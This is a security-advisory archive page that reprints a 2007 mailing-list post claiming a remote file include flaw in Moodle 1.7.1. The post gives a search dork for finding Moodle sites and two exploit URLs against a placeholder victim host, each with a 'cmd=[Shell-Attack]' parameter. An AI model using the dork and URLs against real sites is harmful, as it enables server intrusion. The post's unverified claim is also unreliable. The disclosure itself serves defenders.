Computer Security

Security Advisory: Remote File Include In Script moodle-1.7.1
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Fantastico In all Version Cpanel 10.x <= local File Include

  AssetMan 2.4a <= (download_pdf.
php) Remote File Disclosure Vulnerability

  [Full-disclosure] TinyMCE_exp Remote File Include Vulnerability

  Wiki Remote Authentication Bypass Vulnerability

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:12.03.2007
Subject:Remote File Include In Script moodle-1.7.1

By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com
--------------------------------------------------------------------------
Script : moodle-1.7.1
Dork : "Copyright (c) moodle"
--------------------------------------------------------------------------
B.Files :
utfdbmigrate.php
filter.php
--------------------------------------------------------------------------
Exploits :
http://www.Victim.com/moodle/admin/utfdbmigrate.php?cmd=[Shell-Attack]
http://www.Victim.com/moodle/filter.php?cmd=[Shell-Attack]



--
_______________________________________________
Get your free email from http://bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru